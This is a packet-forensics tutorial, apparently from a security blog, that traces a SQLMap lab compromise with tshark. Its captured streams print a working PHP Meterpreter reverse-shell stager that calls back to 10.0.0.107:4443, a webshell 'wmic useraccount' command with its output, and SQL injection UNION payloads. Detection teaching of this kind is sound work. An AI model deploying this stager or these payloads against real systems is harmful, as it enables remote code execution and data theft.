Now that we have concluded the log analysis and detected that our system has been compromised via the SQLMap exploitation lab, let's now see how the packets can help with detecting this activity. In the interest of time, let's use the "pktIntel" tool from GitHub to see if this IP is known as malicious.
Let's first clone the tool
kali@securtynik:/tmp$ git clone https://github.com/SecurityNik/pktIntel.git Cloning into 'pktIntel'... remote: Enumerating objects: 98, done. remote: Counting objects: 100% (98/98), done. remote: Compressing objects: 100% (94/94), done. remote: Total 98 (delta 48), reused 10 (delta 1), pack-reused 0 Receiving objects: 100% (98/98), 7.49 MiB | 5.05 MiB/s, done. Resolving deltas: 100% (48/48), done.
Now that we have cloned the repo, let's copy the pcap to our "/tmp" directory
kali@securtynik:/tmp$ cp ~/potentialCompromise/Suspect-Compromise/wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng . kali@securtynik:/tmp$ ls wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng
Execute the "pktIntel.py" script with a focus on IP addresses:
kali@securtynik:/tmp/pktIntel$ ./pktIntel.py --ip --------------------------||--------------------------|| pktIntel.py Tool used to perform threat intelligence against packet data Author: Nik Alleyne Author Blog: www.securitynik.com --------------------------||--------------------------|| [*] Checking your permission ... I don't need root permissions to read PCAPS However, if you have PCAPs created by root or other users You should instead run me with root permission via sudo [*] Running as kali with UID 1000 ......... [*] Removing duplicates from the downloaded IPs ... [*] There are currently [4553] unique suspicious IPs downloaded! [*] Reading PCAP files ... Looking for TCP packets where ONLY the SYN flag is set. Also looking at UDP and ICMP packets By looking at the SYN flag, we are assuming the the 3-way handshake has started [*] Note I may take a while so work with me on this ... [*] Comparing downloaded IPs with those in your PCAPs ... ----- 1 SUSPICIOUS IPs DETECTED --------- ['10.0.0.107'] [*] Writing IP information to: [./ip_threat_intel_2020-04-25T10:[./ip_threat_intel_2020-06-29T14:28:59.txt|./IPv6_session_2020-06-29T14:28:59.txt|./IPv6_session_2020-06-29T14:28:59.txt] [*] Reading PCAP File to extract session information: /tmp/wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng [*] Closing the file ./ip_threat_intel_2020-06-29T14:28:59.txt [*] Closing the file ./IPv4_session_2020-06-29T14:28:59.txt [*] Closing the file ./IPv6_session_2020-06-29T14:28:59.txt [*] Completed IP Threat Intelligence Lookup! [*] Happy Hunting! ...
Looking at the "ip_threat_intel_2020-06-29T14:28:59.txt"
kali@securtynik:/tmp/pktIntel$ cat ./ip_threat_intel_2020-06-29T14:28:59.txt IP Address PCAP File 10.0.0.107 /tmp/wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng
Looking at the "./IPv4_session_2020-06-29T14:28:59.txt"
kali@securtynik:/tmp/pktIntel$ cat ./IPv4_session_2020-06-29T14:28:59.txt | wc --lines 35105
Looks like there are over 35,000 lines in this file. Looking at a quick snapshot of the file:
kali@securtynik:/tmp/pktIntel$ cat ./IPv4_session_2020-06-29T14:28:59.txt frame.number frame.time ip.src tcp.srcport ip.dst tcp.dstport frame.len ip.len 1284 Jun 24, 2020 15:28:13.977331000 EDT 10.0.0.107 10.0.0.255 60 44 1285 Jun 24, 2020 15:28:13.977712000 EDT 10.0.0.107 10.0.0.255 60 44 1288 Jun 24, 2020 15:28:13.990469000 EDT 10.0.0.107 10.0.0.255 60 44 1289 Jun 24, 2020 15:28:13.990929000 EDT 10.0.0.107 10.0.0.255 60 44 1490 Jun 24, 2020 15:32:57.736220000 EDT 10.0.0.107 42056 10.0.0.108 80 74 60 1491 Jun 24, 2020 15:32:57.736701000 EDT 10.0.0.108 80 10.0.0.107 42056 66 52 1492 Jun 24, 2020 15:32:57.738115000 EDT 10.0.0.107 42056 10.0.0.108 80 60 40 1493 Jun 24, 2020 15:32:57.740078000 EDT 10.0.0.107 42056 10.0.0.108 80 369 355 1494 Jun 24, 2020 15:32:57.783929000 EDT 10.0.0.108 80 10.0.0.107 42056 54 40 ..........
This looks good but we need the information relating to port 4443 which we learned in the log analysis.
kali@securtynik:/tmp/pktIntel$ cat ./IPv4_session_2020-06-29T14:28:59.txt | grep --perl-regexp "\s+4443\s+" | more 37171 Jun 24, 2020 17:03:23.571105000 EDT 10.0.0.108 6375 10.0.0.107 4443 66 52 37172 Jun 24, 2020 17:03:23.573522000 EDT 10.0.0.107 4443 10.0.0.108 6375 66 52 37173 Jun 24, 2020 17:03:23.581008000 EDT 10.0.0.108 6375 10.0.0.107 4443 54 40 37174 Jun 24, 2020 17:03:23.613422000 EDT 10.0.0.107 4443 10.0.0.108 6375 60 44 37175 Jun 24, 2020 17:03:23.622029000 EDT 10.0.0.107 4443 10.0.0.108 6375 1514 1500 37176 Jun 24, 2020 17:03:23.622033000 EDT 10.0.0.107 4443 10.0.0.108 6375 1514 1500 37177 Jun 24, 2020 17:03:23.623175000 EDT 10.0.0.107 4443 10.0.0.108 6375 1514 1500 37178 Jun 24, 2020 17:03:23.623792000 EDT 10.0.0.107 4443 10.0.0.108 6375 1514 1500 37179 Jun 24, 2020 17:03:23.627904000 EDT 10.0.0.108 6375 10.0.0.107 4443 54 40 37180 Jun 24, 2020 17:03:23.628116000 EDT 10.0.0.107 4443 10.0.0.108 6375 1514 1500 37181 Jun 24, 2020 17:03:23.628118000 EDT 10.0.0.107 4443 10.0.0.108 6375 1514 1500 37182 Jun 24, 2020 17:03:23.629433000 EDT 10.0.0.107 4443 10.0.0.108 6375 1514 1500 .....
Let find the stream relating to this session.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "(ip.addr == 10.0.0.107) && (tcp.port==4443) && (ip.addr==10.0.0.108)" -T fields -e tcp.stream | sort | uniq --count | sort --numeric --reverse 2320 2499 138 2504 6 2502 6 2501
Looks like there are multiple sessions which might have used port "4443". Let's start off with following the stream with number "2499" and which has 2320 packets.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2499 | less =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 2499 Node 0: 10.0.0.108:6375 Node 1: 10.0.0.107:4443 4 .... 1460 /*<?php /**/ if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset($GLOBALS['channel_process_map'])) { $GLOBALS['channel_process_map'] = array(); } if (!isset($GLOBALS['resource_type_map'])) { $GLOBALS['resource_type_map'] = array(); } .... my_print("Evaling main meterpreter stage"); ...........
We get to see PHP code but then we see the traffic is encrypted and at this point, we are unable to see any more clear text.
D&/@D&/@D&/@D&/@D&/@D&/@D&-cD&/@D&/fD'/A'I]%.HJ'+RF!0Cp4(Pp%*E]94RF/*&/@D./AD$.wu..p|..xp..uu..wr..wp..r|..qq./@D'.@E$.mi..m.ch. ....jf.dmj.i..mi,b.^Mdf*.hm'/WG+-a.7tdn..`n..en.|gb.^Mdl'.en..g[9..y0.A`%.Jw0pU....%72qZ.(on7+\F..RBpkO.#)n}o.N...R|+.iiv&M~o2c{8 cC^M.nm#.|.).../..}Jo~L.rWX..BW-(.^p D.$...6.U...mL.s..7.|X97RJ.uua/ kk#tqw.*N..0kE.NkU&&.k.<.^&.j.(.T..ktxp#U.^M..L9..l7rB}%.D..u..'6U.#}\v.#Qh/4qv2.,vr|lX*!.j.w.....^u'AN!v.c >.h$..].+Jd./sn9.nur.V_v!ex.sW./.^Mx2.V%..g.&"VC..Rb00AF-smi..i.u*Q.&.VE/'Sv7"bgotgI6*\}!.A..<L.tsP[...cJoQf..wn.N..mi.j......jf.dmj.i..mi,/ 423 =M............yEA.a.=M..=M.m=M..=M..=L..^"..b#..R9..I(..Q;..S...M9..SM..=d..=O...u...{...{...u...{...}...u...|..=M..?O..=M..=L..9O..H.C..^-?M.6...{:.{u ................... .....Lrj..{..z. .3...sr.N.5..39@..'bB.....R../..e....`..E..ND8.0F..k.2R.AC2...5.:.....>.........b........^M*.D".b$|{.,(...&..;S5....!......2..X.......N.8`...Z.\lYN....8...orhw.i .S!......L.....5H1Td...O."..E...@......=M..?M..=M..=M..9Lr......UL'..dy.7. 128 G..Kt.k...Kv....;..|G..JG..#G..K.&.+.[o....P[.o+..gU.......CFY..4+6F_.E1`..4....u..o.}.k.8....#A..F......O..a.P2.iO..l......g.^M/ .........................
Lets' see what we can learn from the stream with number "2504"
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2504 | less =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 2504 Node 0: 10.0.0.108:6444 Node 1: 10.0.0.107:4443 4 .... 1460 /*<?php /**/ if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); }
At first glance, we can conclude the attacker connected multiple times with the PHP Meterpreter. Actually, we already know that there was multiple connection to this host. We know this because when we looked at the "IPv4_session_2020-06-29T14:28:59.txt", we saw multiple connection on port 4443. No need for us to continue along this path as we already have some insights what this communication looks like.
Looking at the stream numbers for for any sessions created between these hosts and we see:
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "(ip.addr == 10.0.0.107) && (ip.addr==10.0.0.108)" -T fields -e tcp.stream | sort | uniq --count | sort --numeric --reverse | more 2320 2499 138 2504 79 1960 57 27 41 26 40 25 35 1346 34 1499 31 1652 23 29 22 884 22 731 22 578 22 426 22 2419 ..................
Staying on track, when the log analysis was performed, we found the "server.php" file first returned "404 Not Found" and then it was "200 OK". Let's now run a filter for "server.php"
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -t ad -Y "http contains server.php" 37051 2020-06-24 17:01:17.910411 10.0.0.107 → 10.0.0.108 HTTP 420 GET /server.php HTTP/1.1 37082 2020-06-24 17:01:39.806126 10.0.0.107 → 10.0.0.108 HTTP 820 POST /tmpuevkq.php HTTP/1.1 (application/x-php) 37170 2020-06-24 17:03:23.536168 10.0.0.107 → 10.0.0.108 HTTP 420 GET /server.php HTTP/1.1 37207 2020-06-24 17:03:23.753345 10.0.0.107 → 10.0.0.108 HTTP 420 [TCP Spurious Retransmission] GET /server.php HTTP/1.1 37425 2020-06-24 17:07:11.052736 10.0.0.107 → 10.0.0.108 HTTP 420 GET /server.php HTTP/1.1 40372 2020-06-24 17:25:18.121161 10.0.0.107 → 10.0.0.108 HTTP 420 GET /server.php HTTP/1.1
Above we can confirm the time matches with our log analysis for "GET /server.php". We already know in frame "3705"1 this request failed so I won't go deeper into it at this time. However, as we look at frame "37082", we can conclude since this is a "POST" this is more than likely where the file was uploaded as we know after that and from the log analysis, the frame with number "37425" corresponds with the time the request was successful based on the data from our log analysis.. Let's confirm this.
Let's first find the stream number of:
kali@securtynik:/tmp$ tshark -n -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -t ad -Y "frame.number == 37082" -T fields -e tcp.stream 2497
Now that we know the stream number, let's follow it to see inside the payload:
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2497 =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 2497 Node 0: 10.0.0.107:47006 Node 1: 10.0.0.108:80 1460 POST /tmpuevkq.php HTTP/1.1 Host: 10.0.0.108 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.108/tmpuevkq.php Content-Type: multipart/form-data; boundary=---------------------------16439358805639454101277827 Content-Length: 1695 Connection: keep-alive Cookie: PHPSESSID=mtacgh4674o18jbbc80mp31vki Upgrade-Insecure-Requests: 1 -----------------------------16439358805639454101277827 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000000 -----------------------------16439358805639454101277827 Content-Disposition: form-data; name="file"; filename="server.php" Content-Type: application/x-php <?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$le 766 n) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die(); -----------------------------16439358805639454101277827 Content-Disposition: form-data; name="uploadDir" \xampp\htdocs\ -----------------------------16439358805639454101277827 Content-Disposition: form-data; name="upload" upload -----------------------------16439358805639454101277827-- 277 HTTP/1.1 200 OK Date: Wed, 24 Jun 2020 21:01:39 GMT Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1 X-Powered-By: PHP/7.2.1 Content-Length: 24 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 admin.adminFile uploaded ===================================================================
Now that we know the file was uploaded, let's look at the packet with frame number "37425" to see what occurred. Once again, let's find the stream number.
kali@securtynik:/tmp$ tshark -n -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -t ad -Y "frame.number == 37425" -T fields -e tcp.stream 2500
Looking at the payload.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2500 =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 2500 Node 0: 10.0.0.107:47010 Node 1: 10.0.0.108:80 366 GET /server.php HTTP/1.1 Host: 10.0.0.108 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=mtacgh4674o18jbbc80mp31vki Upgrade-Insecure-Requests: 1 261 HTTP/1.1 200 OK Date: Wed, 24 Jun 2020 21:07:11 GMT Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1 X-Powered-By: PHP/7.2.1 Content-Length: 9 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 no socket ===================================================================
Looks like with this "200 OK" no socket was created. Maybe this was because the attacker did not properly set up his system to receive the connection for port "4443" which we learned about above. Let's confirm that the host was not listening on that part and thus sends back a Reset/Ack message.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "tcp.srcport == 4443 && tcp.flags.reset == 1" 37427 7129.654749 10.0.0.107 → 10.0.0.108 TCP 60 4443 → 6387 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 37430 7130.243023 10.0.0.107 → 10.0.0.108 TCP 60 4443 → 6387 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 37432 7130.951952 10.0.0.107 → 10.0.0.108 TCP 60 4443 → 6387 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 37434 7130.968125 10.0.0.107 → 10.0.0.108 TCP 60 4443 → 6388 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 37436 7131.559826 10.0.0.107 → 10.0.0.108 TCP 60 4443 → 6388 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 37438 7132.162256 10.0.0.107 → 10.0.0.108 TCP 60 4443 → 6388 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
We are beginning to tie everything together even activities relating to the threat actor's mistakes. Matters not that those mistakes were made, the reality is our environeent was still compromised by a web vulnerability.
Let's dig a bit more. We learned from the log analysis that the WMIC command was run. Let's confirm the data which was returned.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "http contains wmic" 34590 2766.899183 10.0.0.107 → 10.0.0.108 HTTP 321 GET /tmpbfkst.php?cmd=wmic%20useraccount HTTP/1.1
Finding the stream number and following the stream.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "frame.number == 34590" -T fields -e tcp.stream 2476 kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2476 =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 2476 Node 0: 10.0.0.107:46964 Node 1: 10.0.0.108:80 267 GET /tmpbfkst.php?cmd=wmic%20useraccount HTTP/1.1 Cache-Control: no-cache Cookie: security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0 User-Agent: Opera/9.23 (Windows NT 5.1; U; da) Host: 10.0.0.108 Accept: */* Accept-Encoding: gzip,deflate Connection: close 1460 HTTP/1.1 200 OK Date: Wed, 24 Jun 2020 19:54:28 GMT Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1 X-Powered-By: PHP/7.2.1 Content-Length: 2548 Connection: close Content-Type: text/html; charset=UTF-8 <pre>AccountType Caption Description Disabled Domain FullName InstallDate LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status 512 SECURITYNIK-WIN\Administrator Built-in account for administering the computer/domain FALSE SECURITYNIK-WIN TRUE FALSE Administrator TRUE FALSE TRUE S-1-5-21-3846991316-327138358-508696823-500 1 OK 512 SECURITYNIK-WIN\DefaultAccount A user account managed by the system. TRUE SECURITYNIK-WIN TRUE FALSE DefaultAccount TRUE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-503 1 Degraded 512 SECURITYNIK-WIN\Guest Built-in account for guest access to the computer/domain TRUE 1306 SECURITYNIK-WIN TRUE FALSE Guest FALSE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-501 1 Degraded 512 SECURITYNIK-WIN\SecurityNik FALSE SECURITYNIK-WIN TRUE FALSE SecurityNik TRUE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-1002 1 OK 512 SECURITYNIK-WIN\Toronto FALSE SECURITYNIK-WIN TRUE FALSE Toronto TRUE TRUE TRUE S-1-5-21-3846991316-327138358-508696823-1005 1 OK 512 SECURITYNIK-WIN\WDAGUtilityAccount A user account managed and used by the system for Windows Defender Application Guard scenarios. TRUE SECURITYNIK-WIN TRUE FALSE WDAGUtilityAccount TRUE TRUE TRUE S-1-5-21-3846991316-327138358-508696823-504 1 Degraded </pre> ===================================================================
Similarly, we can look into the clear-text packets to see the queries which were run. Let's pick on the stream number with "1346"
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,1346 =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 1346 Node 0: 10.0.0.107:44704 Node 1: 10.0.0.108:80 435 POST /dvwa/vulnerabilities/sqli/ HTTP/1.1 Content-Length: 271 Cache-Control: no-cache Cookie: security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 Host: 10.0.0.108 Accept: */* Accept-Encoding: gzip,deflate Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection: close 271 id=1%27%20UNION%20ALL%20SELECT%20CONCAT%280x716a7a7a71%2CIFNULL%28CAST%28grantee%20AS%20NCHAR%29%2C0x20%29%2C0x6a7461727468%2CIFNULL%28CAST%28privilege_type%20AS%20NCHAR%29%2C0x20%29%2C0x7170767071%29%2CNULL%20FROM%20INFORMATION_SCHEMA.USER_PRIVILEGES%23&Submit=Submit%23 1460 HTTP/1.1 200 OK Date: Wed, 24 Jun 2020 19:44:52 GMT Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1 X-Powered-By: PHP/7.2.1 ........
Above we see the query which can be found in the parameter "id". We can use a URL Decoder as we did in the log analysis post and convert this to a more human readable string such as:
id=1' UNION ALL SELECT NULL,CONCAT(0x7176786b71,IFNULL(CAST(grantee AS NCHAR),0x20),0x756d76677a67,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x716a6b6b71) FROM INFORMATION_SCHEMA.USER_PRIVILEGES#&Submit=Submit#
Anove we see attempts to read information on the user privileges.
If we look deeper into this same session after following the stream, we see a snapshot below of what was returned, we can see below the user 'root'@'localhost' seems to be in use. Additionally, we see privileges such as "UPDATE", "DELETE", "CREATE".
1460 7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthSELECTqpvpq<br />Sur name: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST( privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthINSERTqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthUPDATEqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: jzzq'root'@'localhost'jtarthDELETEqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR), 0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthCREATEqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGE
Ok at this point, you should have a good understanding of some of the things you can do to detect SQL injection via SQLMap in your environment.
Looking for additional guidance on packet or log analysis? Come hangout with us at one of the upcoming SEC503 Intrusion Detection in Depth class or the soon to be released SEC582 - Mastering TShark Packet Analysis. Additionally, you can grab a copy of Hack and Detect or Mastering TShark Network Forensics.
P.S. Not sure if you noticed it but I would have had to add the private IP address "10.0.0.107" to the script for it to show up. However, the concepts remain the same.
Posts in this series:
References: